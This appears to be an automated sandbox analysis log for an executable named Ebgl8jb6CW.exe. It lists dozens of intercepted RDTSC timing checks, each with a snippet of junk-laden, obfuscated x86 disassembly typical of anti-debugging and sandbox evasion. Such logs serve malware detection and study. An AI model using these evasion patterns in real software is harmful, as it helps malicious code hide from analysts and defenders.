Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 32AE8A second address: 32AE8E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 39451E second address: 394522 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 397CFF second address: 397D05 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 39C341 second address: 39C37E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCA7480D353h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b pushad 0x0000000c pushad 0x0000000d jmp 00007FCA7480D358h 0x00000012 jng 00007FCA7480D346h 0x00000018 popad 0x00000019 push ecx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 39C37E second address: 39C3A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a jo 00007FCA74808099h 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FCA74808087h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 39C3A7 second address: 39C3AB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 39C3AB second address: 39C3E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov eax, dword ptr [eax] 0x00000008 jmp 00007FCA74808088h 0x0000000d mov dword ptr [esp+04h], eax 0x00000011 push esi 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FCA74808082h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 39C3E4 second address: 39C3E8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 39C4B7 second address: 39C50A instructions: 0x00000000 rdtsc 0x00000002 je 00007FCA74808076h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop esi 0x0000000b push eax 0x0000000c push eax 0x0000000d jmp 00007FCA74808085h 0x00000012 pop eax 0x00000013 mov eax, dword ptr [esp+04h] 0x00000017 jc 00007FCA7480807Eh 0x0000001d mov eax, dword ptr [eax] 0x0000001f jg 00007FCA7480807Eh 0x00000025 mov dword ptr [esp+04h], eax 0x00000029 jnp 00007FCA74808080h 0x0000002f push eax 0x00000030 push edx 0x00000031 push edi 0x00000032 pop edi 0x00000033 rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 39C5FE second address: 39C602 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 39C602 second address: 39C650 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCA74808082h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d jnp 00007FCA7480807Eh 0x00000013 jno 00007FCA74808078h 0x00000019 mov eax, dword ptr [eax] 0x0000001b pushad 0x0000001c jnl 00007FCA74808078h 0x00000022 jo 00007FCA74808078h 0x00000028 pushad 0x00000029 popad 0x0000002a popad 0x0000002b mov dword ptr [esp+04h], eax 0x0000002f jbe 00007FCA74808082h 0x00000035 je 00007FCA7480807Ch 0x0000003b push eax 0x0000003c push edx 0x0000003d rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 39C650 second address: 1C895F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jmp 00007FCA7480D351h 0x0000000a jg 00007FCA7480D35Eh 0x00000010 push dword ptr [ebp+122D144Dh] 0x00000016 push 00000000h 0x00000018 push eax 0x00000019 call 00007FCA7480D348h 0x0000001e pop eax 0x0000001f mov dword ptr [esp+04h], eax 0x00000023 add dword ptr [esp+04h], 0000001Ah 0x0000002b inc eax 0x0000002c push eax 0x0000002d ret 0x0000002e pop eax 0x0000002f ret 0x00000030 jmp 00007FCA7480D355h 0x00000035 call dword ptr [ebp+122D1BB3h] 0x0000003b pushad 0x0000003c stc 0x0000003d sub dword ptr [ebp+122D2595h], edx 0x00000043 xor eax, eax 0x00000045 or dword ptr [ebp+122D2595h], ebx 0x0000004b ja 00007FCA7480D34Ch 0x00000051 mov edx, dword ptr [esp+28h] 0x00000055 mov dword ptr [ebp+122D2595h], edi 0x0000005b mov dword ptr [ebp+122D3892h], eax 0x00000061 jg 00007FCA7480D34Eh 0x00000067 mov esi, 0000003Ch 0x0000006c jo 00007FCA7480D34Ch 0x00000072 mov dword ptr [ebp+122D2595h], esi 0x00000078 add esi, dword ptr [esp+24h] 0x0000007c or dword ptr [ebp+122D2595h], eax 0x00000082 lodsw 0x00000084 mov dword ptr [ebp+122D33FFh], ecx 0x0000008a add eax, dword ptr [esp+24h] 0x0000008e mov dword ptr [ebp+122D2595h], ecx 0x00000094 mov ebx, dword ptr [esp+24h] 0x00000098 jmp 00007FCA7480D350h 0x0000009d stc 0x0000009e nop 0x0000009f push ecx 0x000000a0 push esi 0x000000a1 push eax 0x000000a2 push edx 0x000000a3 rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 3A194B second address: 3A1951 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 3A1951 second address: 3A195F instructions: 0x00000000 rdtsc 0x00000002 jo 00007FCA7480D346h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push edi 0x0000000d pop edi 0x0000000e rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 3A195F second address: 3A1963 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 3A1FFA second address: 3A2017 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCA7480D357h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 3A2017 second address: 3A2035 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FCA74808076h 0x0000000a popad 0x0000000b jng 00007FCA7480807Ah 0x00000011 push edi 0x00000012 push eax 0x00000013 pop eax 0x00000014 pushad 0x00000015 popad 0x00000016 pop edi 0x00000017 push ecx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 3A2289 second address: 3A229E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FCA7480D346h 0x0000000a jne 00007FCA7480D346h 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 3A229E second address: 3A22A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 3A22A2 second address: 3A22AC instructions: 0x00000000 rdtsc 0x00000002 jp 00007FCA7480D346h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 3A22AC second address: 3A22C0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 jmp 00007FCA7480807Dh 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 3A22C0 second address: 3A22E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCA7480D359h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f push esi 0x00000010 pop esi 0x00000011 rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 3A25DE second address: 3A25E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 3A25E6 second address: 3A25EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 3A25EB second address: 3A2604 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FCA7480807Ah 0x00000008 jmp 00007FCA7480807Ah 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 3A2604 second address: 3A260E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 3A260E second address: 3A2614 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 331A4A second address: 331A56 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jnl 00007FCA7480D346h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 331A56 second address: 331A5A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 3736E3 second address: 3736E8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 3736E8 second address: 359687 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c call 00007FCA74808086h 0x00000011 jg 00007FCA7480807Ch 0x00000017 pop edi 0x00000018 lea eax, dword ptr [ebp+1247E48Dh] 0x0000001e push 00000000h 0x00000020 push ebx 0x00000021 call 00007FCA74808078h 0x00000026 pop ebx 0x00000027 mov dword ptr [esp+04h], ebx 0x0000002b add dword ptr [esp+04h], 0000001Bh 0x00000033 inc ebx 0x00000034 push ebx 0x00000035 ret 0x00000036 pop ebx 0x00000037 ret 0x00000038 mov ecx, dword ptr [ebp+122D1C3Ch] 0x0000003e push eax 0x0000003f jmp 00007FCA74808084h 0x00000044 mov dword ptr [esp], eax 0x00000047 sub dword ptr [ebp+122D3410h], edi 0x0000004d mov di, EA90h 0x00000051 call dword ptr [ebp+122D333Ch] 0x00000057 push ecx 0x00000058 jc 00007FCA74808084h 0x0000005e jmp 00007FCA7480807Ch 0x00000063 pushad 0x00000064 popad 0x00000065 push eax 0x00000066 push edx 0x00000067 jns 00007FCA74808076h 0x0000006d rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 373C6B second address: 373C96 instructions: 0x00000000 rdtsc 0x00000002 js 00007FCA7480D354h 0x00000008 jmp 00007FCA7480D34Eh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push edx 0x00000013 jmp 00007FCA7480D34Eh 0x00000018 pop edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 373D7B second address: 373D99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 jns 00007FCA7480807Ch 0x0000000d popad 0x0000000e mov eax, dword ptr [esp+04h] 0x00000012 push eax 0x00000013 push edx 0x00000014 push edi 0x00000015 push ecx 0x00000016 pop ecx 0x00000017 pop edi 0x00000018 rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 373D99 second address: 373D9F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 3749D1 second address: 3749F8 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FCA74808076h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop esi 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f pushad 0x00000010 jmp 00007FCA74808083h 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 pop eax 0x00000019 rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 3749F8 second address: 374A0E instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [eax] 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FCA7480D34Bh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 374AAA second address: 374AB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 js 00007FCA7480807Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 374AB7 second address: 374B43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 pushad 0x00000007 pushad 0x00000008 jnc 00007FCA7480D346h 0x0000000e jmp 00007FCA7480D352h 0x00000013 popad 0x00000014 jmp 00007FCA7480D355h 0x00000019 popad 0x0000001a nop 0x0000001b jns 00007FCA7480D34Ch 0x00000021 lea eax, dword ptr [ebp+1247E4D1h] 0x00000027 push 00000000h 0x00000029 push ebx 0x0000002a call 00007FCA7480D348h 0x0000002f pop ebx 0x00000030 mov dword ptr [esp+04h], ebx 0x00000034 add dword ptr [esp+04h], 0000001Bh 0x0000003c inc ebx 0x0000003d push ebx 0x0000003e ret 0x0000003f pop ebx 0x00000040 ret 0x00000041 nop 0x00000042 jmp 00007FCA7480D358h 0x00000047 push eax 0x00000048 pushad 0x00000049 push eax 0x0000004a push edx 0x0000004b push eax 0x0000004c push edx 0x0000004d rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 374B43 second address: 374B47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 374B47 second address: 374B8A instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FCA7480D346h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jo 00007FCA7480D348h 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 popad 0x00000013 nop 0x00000014 pushad 0x00000015 sub dword ptr [ebp+122D1C8Fh], eax 0x0000001b mov dword ptr [ebp+122D3409h], edi 0x00000021 popad 0x00000022 lea eax, dword ptr [ebp+1247E48Dh] 0x00000028 jnl 00007FCA7480D351h 0x0000002e jmp 00007FCA7480D34Bh 0x00000033 nop 0x00000034 push esi 0x00000035 jnc 00007FCA7480D34Ch 0x0000003b push eax 0x0000003c push edx 0x0000003d rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 374B8A second address: 35A1C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 jl 00007FCA74808088h 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push ebp 0x00000010 call 00007FCA74808078h 0x00000015 pop ebp 0x00000016 mov dword ptr [esp+04h], ebp 0x0000001a add dword ptr [esp+04h], 00000016h 0x00000022 inc ebp 0x00000023 push ebp 0x00000024 ret 0x00000025 pop ebp 0x00000026 ret 0x00000027 js 00007FCA74808077h 0x0000002d clc 0x0000002e or dword ptr [ebp+122D2409h], edx 0x00000034 call dword ptr [ebp+122D1BBAh] 0x0000003a jc 00007FCA74808084h 0x00000040 pushad 0x00000041 jc 00007FCA74808076h 0x00000047 push eax 0x00000048 push edx 0x00000049 rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 3A9B4D second address: 3A9B9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCA7480D359h 0x00000009 jmp 00007FCA7480D352h 0x0000000e popad 0x0000000f jl 00007FCA7480D35Ah 0x00000015 pushad 0x00000016 popad 0x00000017 jmp 00007FCA7480D352h 0x0000001c pop edx 0x0000001d push eax 0x0000001e push ecx 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 3AA15D second address: 3AA167 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FCA74808076h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 3AA167 second address: 3AA177 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b pop edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 3AA177 second address: 3AA189 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCA7480807Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 3AA189 second address: 3AA18D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 3AA2BE second address: 3AA2C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 3AA2C7 second address: 3AA2CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 3AA2CD second address: 3AA2D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 3AA2D1 second address: 3AA2DB instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FCA7480D346h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 3AA45F second address: 3AA465 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 3AA465 second address: 3AA46B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 3AA46B second address: 3AA476 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 pushad 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 3AA608 second address: 3AA619 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCA7480D34Ch 0x00000009 pop edi 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 3AA619 second address: 3AA61E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 3AA61E second address: 3AA62A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FCA7480D346h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 3AA62A second address: 3AA630 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 3AA630 second address: 3AA648 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FCA7480D351h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 3AEDB1 second address: 3AEDB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 3AEDB6 second address: 3AEDD2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FCA7480D356h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 3AEDD2 second address: 3AEDD6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 3AEF2A second address: 3AEF2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 3AEF2E second address: 3AEF32 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 3AEF32 second address: 3AEF38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 3AF08B second address: 3AF090 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 3AF090 second address: 3AF0D5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FCA7480D353h 0x00000008 jmp 00007FCA7480D358h 0x0000000d push esi 0x0000000e pop esi 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FCA7480D34Fh 0x0000001a rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 3AF778 second address: 3AF77C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 3AF77C second address: 3AF782 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 3B466E second address: 3B4674 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 3B4674 second address: 3B4679 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 3B4BC8 second address: 3B4BD9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCA7480807Dh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 3B4BD9 second address: 3B4C0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FCA7480D358h 0x0000000c jmp 00007FCA7480D353h 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 3B4C0F second address: 3B4C2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCA74808087h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 3B42B6 second address: 3B42D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCA7480D356h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 3B5202 second address: 3B5208 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 3B5208 second address: 3B520C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 3B520C second address: 3B5210 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 3B5210 second address: 3B5254 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jno 00007FCA7480D34Ch 0x0000000c push ecx 0x0000000d push edx 0x0000000e pop edx 0x0000000f jmp 00007FCA7480D34Bh 0x00000014 pop ecx 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007FCA7480D34Ah 0x0000001d jmp 00007FCA7480D356h 0x00000022 rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 3B5254 second address: 3B525B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
